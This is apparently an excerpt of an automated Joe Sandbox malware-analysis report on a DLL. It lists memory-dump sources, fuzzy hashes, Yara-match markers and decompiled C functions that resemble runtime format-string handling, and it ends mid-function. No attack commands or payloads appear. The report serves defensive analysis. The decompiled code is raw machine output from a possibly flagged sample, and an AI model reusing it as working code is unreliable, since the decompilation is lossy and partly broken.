                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: gfffffff
                                                                      • API String ID: 0-1523873471
                                                                      • Opcode ID: 15e9c8cd177df862ca4671b5def0dd4533514f1833b4126ee14ea12ddd777aef
                                                                      • Instruction ID: 9b5eb9658a9e8eace6f66f7f42df1ff0c33ae2839334918ac3caf3a36f0fdf4e
                                                                      • Opcode Fuzzy Hash: 15e9c8cd177df862ca4671b5def0dd4533514f1833b4126ee14ea12ddd777aef
                                                                      • Instruction Fuzzy Hash: 93A133727147CC86EBB3CB25A4507EA7791A7587C4F06D122EE4947785DE3EC609C701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 47%
                                                                      			E00000001180025740(signed int __esi, long long __rbx, void* __rcx, long long __rbp, long long _a16, long long _a24) {
                                                                      				long long _v32;
                                                                      				long long _v40;
                                                                      				void* __rsi;
                                                                      				long long _t20;
                                                                      				void* _t26;
                                                                      				void* _t27;
                                                                      				void* _t33;
                                                                      
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rbp;
                                                                      				_t20 =  *((intOrPtr*)(__rcx + 8));
                                                                      				if ( *((intOrPtr*)(__rcx + 0x460)) != 0) goto 0x800257a3;
                                                                      				 *((char*)(_t20 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t20 + 0x2c)) = 0x16;
                                                                      				_v32 = _t20;
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				_v40 = __rbp;
                                                                      				E00000001180013858(_t20, __rcx,  *((intOrPtr*)(__rcx + 0x460)), _t26, _t27, __rbp, _t33);
                                                                      				return __esi | 0xffffffff;
                                                                      			}










                                                                      0x180025740
                                                                      0x180025745
                                                                      0x180025752
                                                                      0x180025768
                                                                      0x18002576a
                                                                      0x18002576e
                                                                      0x180025775
                                                                      0x18002577a
                                                                      0x18002577d
                                                                      0x180025780
                                                                      0x180025789
                                                                      0x1800257a2

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID: 0-3916222277
                                                                      • Opcode ID: 22c9e8d689a54622540df2a8af00dbd32aa67f9f25dde6f080fd1b9c3bd61578
                                                                      • Instruction ID: 26d1df5c73e6807aee858c9e0aaf820920b1088dabde58946c93399dc4eb3995
                                                                      • Opcode Fuzzy Hash: 22c9e8d689a54622540df2a8af00dbd32aa67f9f25dde6f080fd1b9c3bd61578
                                                                      • Instruction Fuzzy Hash: DBB1B572114748C6E7A78F29C0953AD3BA1E30DB99F188219EFC947399CF35CA88C759
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 47%
                                                                      			E00000001180025EFC(signed int __esi, long long __rbx, void* __rcx, long long __rbp, long long _a16, long long _a24) {
                                                                      				long long _v32;
                                                                      				long long _v40;
                                                                      				void* __rsi;
                                                                      				long long _t20;
                                                                      				void* _t26;
                                                                      				void* _t27;
                                                                      				void* _t33;
                                                                      
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rbp;
                                                                      				_t20 =  *((intOrPtr*)(__rcx + 8));
                                                                      				if ( *((intOrPtr*)(__rcx + 0x460)) != 0) goto 0x80025f5f;
                                                                      				 *((char*)(_t20 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t20 + 0x2c)) = 0x16;
                                                                      				_v32 = _t20;
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				_v40 = __rbp;
                                                                      				E00000001180013858(_t20, __rcx,  *((intOrPtr*)(__rcx + 0x460)), _t26, _t27, __rbp, _t33);
                                                                      				return __esi | 0xffffffff;
                                                                      			}










                                                                      0x180025efc
                                                                      0x180025f01
                                                                      0x180025f0e
                                                                      0x180025f24
                                                                      0x180025f26
                                                                      0x180025f2a
                                                                      0x180025f31
                                                                      0x180025f36
                                                                      0x180025f39
                                                                      0x180025f3c
                                                                      0x180025f45
                                                                      0x180025f5e

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID: 0-3916222277
                                                                      • Opcode ID: 9a29f0ec7b0a03ddcbb7e7a3ef8d20301706f48db660bb86ecd2ac72ae63b8ee
                                                                      • Instruction ID: 8ed4cb16b7927c9230f8017afb3cedd234ca0c98d384b0334fdd51629234769d
                                                                      • Opcode Fuzzy Hash: 9a29f0ec7b0a03ddcbb7e7a3ef8d20301706f48db660bb86ecd2ac72ae63b8ee
                                                                      • Instruction Fuzzy Hash: F6B19172604B5885E7E78F39C0943AD3BA0E34DB89F18811AEF4A073A6CF35CA58D754
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 60%
                                                                      			E00000001180026A24(signed int __esi, long long __rbx, signed long long __rcx, void* __rdx, signed int __rbp, void* __r8, void* __r10, long long _a16, long long _a24) {
                                                                      				long long _v32;
                                                                      				long long _v40;
                                                                      				void* __rdi;
                                                                      				void* __rsi;
                                                                      				signed int _t113;
                                                                      				void* _t118;
                                                                      				signed int _t133;
                                                                      				signed int _t135;
                                                                      				void* _t139;
                                                                      				signed int _t141;
                                                                      				signed int _t150;
                                                                      				void* _t163;
                                                                      				intOrPtr _t171;
                                                                      				intOrPtr* _t173;
                                                                      				intOrPtr* _t184;
                                                                      				intOrPtr* _t189;
                                                                      				signed long long _t192;
                                                                      				signed long long _t194;
                                                                      				intOrPtr _t200;
                                                                      				intOrPtr _t202;
                                                                      				void* _t209;
                                                                      				void* _t211;
                                                                      				signed int _t212;
                                                                      				void* _t217;
                                                                      				void* _t218;
                                                                      
                                                                      				_t218 = __r10;
                                                                      				_t217 = __r8;
                                                                      				_t212 = __rbp;
                                                                      				_t194 = __rcx;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rbp;
                                                                      				_t171 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_t141 = __esi | 0xffffffff;
                                                                      				_t192 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x460)) != __rbp) goto 0x80026a5b;
                                                                      				 *((char*)(_t171 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t171 + 0x2c)) = 0x16;
                                                                      				goto 0x80026d89;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x10)) != __rbp) goto 0x80026a91;
                                                                      				 *((char*)(_t171 + 0x30)) = 1;
                                                                      				r9d = 0;
                                                                      				 *((intOrPtr*)(_t171 + 0x2c)) = 0x16;
                                                                      				r8d = 0;
                                                                      				_v32 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v40 = __rbp;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, __rdx, _t211, __rbp, __r8);
                                                                      				goto 0x80026d37;
                                                                      				 *((intOrPtr*)(_t194 + 0x468)) =  *((intOrPtr*)(_t194 + 0x468)) + 1;
                                                                      				if ( *((intOrPtr*)(_t194 + 0x468)) == 2) goto 0x80026d34;
                                                                      				_t173 =  *((intOrPtr*)(_t192 + 0x10));
                                                                      				 *((intOrPtr*)(_t192 + 0x48)) = 0;
                                                                      				 *(_t192 + 0x24) = bpl;
                                                                      				r8b =  *_t173;
                                                                      				 *((long long*)(_t192 + 0x10)) = _t173 + 1;
                                                                      				 *((intOrPtr*)(_t192 + 0x39)) = r8b;
                                                                      				if (r8b == 0) goto 0x80026d21;
                                                                      				r9b = r8b;
                                                                      				if ( *(_t192 + 0x20) < 0) goto 0x80026d21;
                                                                      				if (_t217 - 0x20 - 0x5a > 0) goto 0x80026af3;
                                                                      				goto 0x80026af6;
                                                                      				_t113 =  *(0x8005fbe0 + (r8b - 0x20 + _t194 * 8) * 2) & 0x000000ff;
                                                                      				 *(_t192 + 0x24) = _t113;
                                                                      				if (_t113 - 8 >= 0) goto 0x80026d76;
                                                                      				_t150 = _t113;
                                                                      				if (_t150 == 0) goto 0x80026c30;
                                                                      				if (_t150 == 0) goto 0x80026c19;
                                                                      				if (_t150 == 0) goto 0x80026bca;
                                                                      				if (_t150 == 0) goto 0x80026b93;
                                                                      				if (_t150 == 0) goto 0x80026b8b;
                                                                      				if (_t150 == 0) goto 0x80026b61;
                                                                      				if (_t150 == 0) goto 0x80026b57;
                                                                      				if (_t113 - 0xfffffffffffffffc != 1) goto 0x80026da2;
                                                                      				E0000000118002C900(_t139, _t192, _t192, r8b - 0x20 + _t194 * 8, _t209, _t211, _t217, _t218);
                                                                      				goto 0x80026bbd;
                                                                      				E0000000118002A910(_t192, r8b - 0x20 + _t194 * 8);
                                                                      				goto 0x80026bbd;
                                                                      				if (r8b == 0x2a) goto 0x80026b75;
                                                                      				E00000001180025350(_t192, _t192, _t192 + 0x30, _t211);
                                                                      				goto 0x80026bbd;
                                                                      				 *((long long*)(_t192 + 0x18)) =  *((long long*)(_t192 + 0x18)) + 8;
                                                                      				_t133 =  *( *((intOrPtr*)(_t192 + 0x18)) - 8);
                                                                      				_t134 =  <  ? _t141 : _t133;
                                                                      				 *(_t192 + 0x30) =  <  ? _t141 : _t133;
                                                                      				goto 0x80026bbb;
                                                                      				 *(_t192 + 0x30) = 0;
                                                                      				goto 0x80026d03;
                                                                      				if (r8b == 0x2a) goto 0x80026b9f;
                                                                      				goto 0x80026b6b;
                                                                      				 *((long long*)(_t192 + 0x18)) =  *((long long*)(_t192 + 0x18)) + 8;
                                                                      				_t135 =  *( *((intOrPtr*)(_t192 + 0x18)) - 8);
                                                                      				 *(_t192 + 0x2c) = _t135;
                                                                      				if (_t135 >= 0) goto 0x80026bbb;
                                                                      				 *(_t192 + 0x28) =  *(_t192 + 0x28) | 0x00000004;
                                                                      				 *(_t192 + 0x2c) =  ~_t135;
                                                                      				if (1 == 0) goto 0x80026da2;
                                                                      				goto 0x80026d03;
                                                                      				if (r8b == 0x20) goto 0x80026c10;
                                                                      				if (r8b == 0x23) goto 0x80026c07;
                                                                      				if (r8b == 0x2b) goto 0x80026bfe;
                                                                      				if (r8b == 0x2d) goto 0x80026bf5;
                                                                      				if (r8b != 0x30) goto 0x80026d03;
                                                                      				 *(_t192 + 0x28) =  *(_t192 + 0x28) | 0x00000008;
                                                                      				goto 0x80026d03;
                                                                      				 *(_t192 + 0x28) =  *(_t192 + 0x28) | 0x00000004;
                                                                      				goto 0x80026d03;
                                                                      				 *(_t192 + 0x28) =  *(_t192 + 0x28) | 0x00000001;
                                                                      				goto 0x80026d03;
                                                                      				 *(_t192 + 0x28) =  *(_t192 + 0x28) | 0x00000020;
                                                                      				goto 0x80026d03;
                                                                      				 *(_t192 + 0x28) =  *(_t192 + 0x28) | 0x00000002;
                                                                      				goto 0x80026d03;
                                                                      				 *(_t192 + 0x28) = _t212;
                                                                      				 *(_t192 + 0x38) = bpl;
                                                                      				 *(_t192 + 0x30) = _t141;
                                                                      				 *((intOrPtr*)(_t192 + 0x34)) = 0;
                                                                      				 *(_t192 + 0x4c) = bpl;
                                                                      				goto 0x80026d03;
                                                                      				 *(_t192 + 0x4c) = bpl;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t192 + 8)) + 0x28)) != bpl) goto 0x80026c4d;
                                                                      				_t118 = E000000011800338E0( *((intOrPtr*)(_t192 + 0x18)), _t192,  *((intOrPtr*)(_t192 + 8)), _t192 + 0x2c, _t211);
                                                                      				r8b =  *((intOrPtr*)(_t192 + 0x39));
                                                                      				r9b = r8b;
                                                                      				_t163 = _t118 - _t141;
                                                                      				if (_t163 < 0) goto 0x80026cc4;
                                                                      				if (_t163 == 0) goto 0x80026cc4;
                                                                      				_t200 =  *((intOrPtr*)(_t192 + 0x460));
                                                                      				if ( *((intOrPtr*)(_t200 + 0x10)) !=  *((intOrPtr*)(_t200 + 8))) goto 0x80026c8b;
                                                                      				if ( *((intOrPtr*)(_t200 + 0x18)) == bpl) goto 0x80026c86;
                                                                      				 *(_t192 + 0x20) =  *(_t192 + 0x20) + 1;
                                                                      				goto 0x80026ca9;
                                                                      				 *(_t192 + 0x20) = _t141;
                                                                      				goto 0x80026ca9;
                                                                      				 *(_t192 + 0x20) =  *(_t192 + 0x20) + 1;
                                                                      				 *((long long*)(_t200 + 0x10)) =  *((long long*)(_t200 + 0x10)) + 1;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x460)))))) = r8b;
                                                                      				 *((long long*)( *((intOrPtr*)(_t192 + 0x460)))) =  *((long long*)( *((intOrPtr*)(_t192 + 0x460)))) + 1;
                                                                      				_t184 =  *((intOrPtr*)(_t192 + 0x10));
                                                                      				r9b =  *_t184;
                                                                      				 *((long long*)(_t192 + 0x10)) = _t184 + 1;
                                                                      				 *((intOrPtr*)(_t192 + 0x39)) = r9b;
                                                                      				if (r9b == 0) goto 0x80026d4a;
                                                                      				_t202 =  *((intOrPtr*)(_t192 + 0x460));
                                                                      				if ( *((intOrPtr*)(_t202 + 0x10)) !=  *((intOrPtr*)(_t202 + 8))) goto 0x80026ce5;
                                                                      				if ( *((intOrPtr*)(_t202 + 0x18)) == bpl) goto 0x80026ce0;
                                                                      				 *(_t192 + 0x20) =  *(_t192 + 0x20) + 1;
                                                                      				goto 0x80026d03;
                                                                      				 *(_t192 + 0x20) = _t141;
                                                                      				goto 0x80026d03;
                                                                      				 *(_t192 + 0x20) =  *(_t192 + 0x20) + 1;
                                                                      				 *((long long*)(_t202 + 0x10)) =  *((long long*)(_t202 + 0x10)) + 1;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x460)))))) = r9b;
                                                                      				 *((long long*)( *((intOrPtr*)(_t192 + 0x460)))) =  *((long long*)( *((intOrPtr*)(_t192 + 0x460)))) + 1;
                                                                      				_t189 =  *((intOrPtr*)(_t192 + 0x10));
                                                                      				r8b =  *_t189;
                                                                      				 *((long long*)(_t192 + 0x10)) = _t189 + 1;
                                                                      				r9b = r8b;
                                                                      				 *((intOrPtr*)(_t192 + 0x39)) = r8b;
                                                                      				if (r8b != 0) goto 0x80026ad0;
                                                                      				 *((intOrPtr*)(_t192 + 0x468)) =  *((intOrPtr*)(_t192 + 0x468)) + 1;
                                                                      				if ( *((intOrPtr*)(_t192 + 0x468)) != 2) goto 0x80026aab;
                                                                      				return  *(_t192 + 0x20);
                                                                      			}




























                                                                      0x180026a24
                                                                      0x180026a24
                                                                      0x180026a24
                                                                      0x180026a24
                                                                      0x180026a24
                                                                      0x180026a29
                                                                      0x180026a36
                                                                      0x180026a3a
                                                                      0x180026a3f
                                                                      0x180026a49
                                                                      0x180026a4b
                                                                      0x180026a4f
                                                                      0x180026a56
                                                                      0x180026a5f
                                                                      0x180026a61
                                                                      0x180026a65
                                                                      0x180026a68
                                                                      0x180026a6f
                                                                      0x180026a78
                                                                      0x180026a7f
                                                                      0x180026a84
                                                                      0x180026a8c
                                                                      0x180026a91
                                                                      0x180026a9e
                                                                      0x180026aab
                                                                      0x180026aaf
                                                                      0x180026ab2
                                                                      0x180026ab6
                                                                      0x180026abc
                                                                      0x180026ac0
                                                                      0x180026ac7
                                                                      0x180026acd
                                                                      0x180026ad3
                                                                      0x180026adf
                                                                      0x180026af1
                                                                      0x180026b04
                                                                      0x180026b09
                                                                      0x180026b0e
                                                                      0x180026b16
                                                                      0x180026b18
                                                                      0x180026b21
                                                                      0x180026b2a
                                                                      0x180026b33
                                                                      0x180026b38
                                                                      0x180026b3d
                                                                      0x180026b42
                                                                      0x180026b47
                                                                      0x180026b50
                                                                      0x180026b55
                                                                      0x180026b5a
                                                                      0x180026b5f
                                                                      0x180026b65
                                                                      0x180026b6e
                                                                      0x180026b73
                                                                      0x180026b75
                                                                      0x180026b7e
                                                                      0x180026b83
                                                                      0x180026b86
                                                                      0x180026b89
                                                                      0x180026b8b
                                                                      0x180026b8e
                                                                      0x180026b97
                                                                      0x180026b9d
                                                                      0x180026b9f
                                                                      0x180026ba8
                                                                      0x180026bab
                                                                      0x180026bb0
                                                                      0x180026bb2
                                                                      0x180026bb8
                                                                      0x180026bbf
                                                                      0x180026bc5
                                                                      0x180026bce
                                                                      0x180026bd4
                                                                      0x180026bda
                                                                      0x180026be0
                                                                      0x180026be6
                                                                      0x180026bec
                                                                      0x180026bf0
                                                                      0x180026bf5
                                                                      0x180026bf9
                                                                      0x180026bfe
                                                                      0x180026c02
                                                                      0x180026c07
                                                                      0x180026c0b
                                                                      0x180026c10
                                                                      0x180026c14
                                                                      0x180026c19
                                                                      0x180026c1d
                                                                      0x180026c21
                                                                      0x180026c24
                                                                      0x180026c27
                                                                      0x180026c2b
                                                                      0x180026c34
                                                                      0x180026c3c
                                                                      0x180026c41
                                                                      0x180026c46
                                                                      0x180026c4a
                                                                      0x180026c51
                                                                      0x180026c53
                                                                      0x180026c68
                                                                      0x180026c6a
                                                                      0x180026c79
                                                                      0x180026c7f
                                                                      0x180026c81
                                                                      0x180026c84
                                                                      0x180026c86
                                                                      0x180026c89
                                                                      0x180026c8b
                                                                      0x180026c8e
                                                                      0x180026c9c
                                                                      0x180026ca6
                                                                      0x180026ca9
                                                                      0x180026cad
                                                                      0x180026cb3
                                                                      0x180026cb7
                                                                      0x180026cbe
                                                                      0x180026cc4
                                                                      0x180026cd3
                                                                      0x180026cd9
                                                                      0x180026cdb
                                                                      0x180026cde
                                                                      0x180026ce0
                                                                      0x180026ce3
                                                                      0x180026ce5
                                                                      0x180026ce8
                                                                      0x180026cf6
                                                                      0x180026d00
                                                                      0x180026d03
                                                                      0x180026d07
                                                                      0x180026d0d
                                                                      0x180026d11
                                                                      0x180026d14
                                                                      0x180026d1b
                                                                      0x180026d21
                                                                      0x180026d2e
                                                                      0x180026d49

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID: 0-3916222277
                                                                      • Opcode ID: dcdd848495dbafeb9bc5f26249417655877a00d055c837b1d3a73128db9fb091
                                                                      • Instruction ID: d7683a3b78e2aa861da3147e7b8a08a9c942228ccad78e55904ff1517cca5c5c
                                                                      • Opcode Fuzzy Hash: dcdd848495dbafeb9bc5f26249417655877a00d055c837b1d3a73128db9fb091
                                                                      • Instruction Fuzzy Hash: 8AB19072A04B9C86E7A78F29C0543AC3BA0F34DB89F249119EF4A473A5CF35C699C745
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: >Rmi
                                                                      • API String ID: 0-3132450374
                                                                      • Opcode ID: e21b6df5a34cb4e8e96921adb36fc9e903f60ed374113cea348f266eb152327c
                                                                      • Instruction ID: f107a7dd9a26b2dd510ca7e443ea1bb50e032c2c1a2fb76085801d56b0bad6e5
                                                                      • Opcode Fuzzy Hash: e21b6df5a34cb4e8e96921adb36fc9e903f60ed374113cea348f266eb152327c
                                                                      • Instruction Fuzzy Hash: 7CC1FA715087C88FEBBACF64C899ADE7BE8FB44708F10461DE94ADA294DBB45744CB01
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: nf
                                                                      • API String ID: 0-511086779
                                                                      • Opcode ID: c783981f98dfcff9253c90c0b40cb4186f2ddc319e405974b5f0546962d9f338
                                                                      • Instruction ID: eeb1783d4da875033f71eafe84baa579b36c51ae2d09493dadfbfaab509670cd
                                                                      • Opcode Fuzzy Hash: c783981f98dfcff9253c90c0b40cb4186f2ddc319e405974b5f0546962d9f338
                                                                      • Instruction Fuzzy Hash: 96B14F715143898FEBB8CF28D896BDD7BA1FB45304F508129EC8ECE291CB745A49DB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: H==
                                                                      • API String ID: 0-2097848114
                                                                      • Opcode ID: 6aa1afaeaad519201849dbc7e157ccdea6bd05ed84e970835034cc355b1b1bc0
                                                                      • Instruction ID: 8923fbc82d1ae5e9b84e489453a138101bdf22eaca43232fdc6937b8a6fc358f
                                                                      • Opcode Fuzzy Hash: 6aa1afaeaad519201849dbc7e157ccdea6bd05ed84e970835034cc355b1b1bc0
                                                                      • Instruction Fuzzy Hash: F1B14970900708CFEFA8CFA8D8999DDBBB0FB04354F505169F846AB694D7B49886CF81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: iS
                                                                      • API String ID: 0-1343070094
                                                                      • Opcode ID: 25276cdb969a49ef9c1e14763d65e272f0d6356fed2457f95a15ef8918c117c0
                                                                      • Instruction ID: 83557e962d2cd136ce3222f374313755259884dead68e2706456d70058dabbfa
                                                                      • Opcode Fuzzy Hash: 25276cdb969a49ef9c1e14763d65e272f0d6356fed2457f95a15ef8918c117c0
                                                                      • Instruction Fuzzy Hash: 7BB1F3B150474ACFDB98DF28D4899CA3BE0FF48314F41452AFC499B2A4D374DA68DB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0_N
                                                                      • API String ID: 0-1005381763
                                                                      • Opcode ID: 66f73bde71857f2768625a486b850502f407701e72f4f84b17173857b5bb8ce6
                                                                      • Instruction ID: beca4b9da6b208ca5e71df11a098eea20027d1aa778aaedea1af996c21796b76
                                                                      • Opcode Fuzzy Hash: 66f73bde71857f2768625a486b850502f407701e72f4f84b17173857b5bb8ce6
                                                                      • Instruction Fuzzy Hash: 96B175B590024DCBDBA8CF38C14A59D7BE1BB54308F606129FC269A2B2E3B4D919CF54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: |PF
                                                                      • API String ID: 0-3392517737
                                                                      • Opcode ID: bc61e09b7d1210c127e42a950b3f768bafdcd2c6281ccb9736a09fc17edbea84
                                                                      • Instruction ID: f49f8a347efd0e3e2cad28c830efd36b84e45762f9f62804b56d63e1b91aa7c1
                                                                      • Opcode Fuzzy Hash: bc61e09b7d1210c127e42a950b3f768bafdcd2c6281ccb9736a09fc17edbea84
                                                                      • Instruction Fuzzy Hash: DB91207011024A8BEF58CF28D8975DE3FA0FB24348F214229FD86962A0D778D665CBC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %rJ
                                                                      • API String ID: 0-1336993117
                                                                      • Opcode ID: 9dbb960e2fa26b28cdfd59e86d9a90996c0c910b63b490fead436fa2390c969a
                                                                      • Instruction ID: 4985546c741c99415f4d1a63fd1fe2f519c02294c63c9dc4b68403b31c9e4918
                                                                      • Opcode Fuzzy Hash: 9dbb960e2fa26b28cdfd59e86d9a90996c0c910b63b490fead436fa2390c969a
                                                                      • Instruction Fuzzy Hash: 22A1FB7050438DABEBBEDF24DC966DA37A9FB48704F108619EC6E8E290CB765745CB01
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: D=",
                                                                      • API String ID: 0-2364230774
                                                                      • Opcode ID: 341c41dceb64fee3a9e1cbb856ceda06c278c7da28d488f4ea5d7b40f404de38
                                                                      • Instruction ID: aa201da32f5444320aa87092129e21f322b5eee7e320bcd0e1a7353bf52b33d6
                                                                      • Opcode Fuzzy Hash: 341c41dceb64fee3a9e1cbb856ceda06c278c7da28d488f4ea5d7b40f404de38
                                                                      • Instruction Fuzzy Hash: 839165B590070DCFDB99DF28C19A59E3BA8FF59308F104129FC1E8A6A4D378E518CB46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 82%
                                                                      			E000000011800548F8(void* __ecx, void* __edx, void* __rcx, void* __r8, void* __r10, signed long long* _a40) {
                                                                      				signed int _v72;
                                                                      				char _v200;
                                                                      				signed int _v216;
                                                                      				intOrPtr _v232;
                                                                      				void* __rbx;
                                                                      				void* __rdi;
                                                                      				void* __rsi;
                                                                      				void* __rbp;
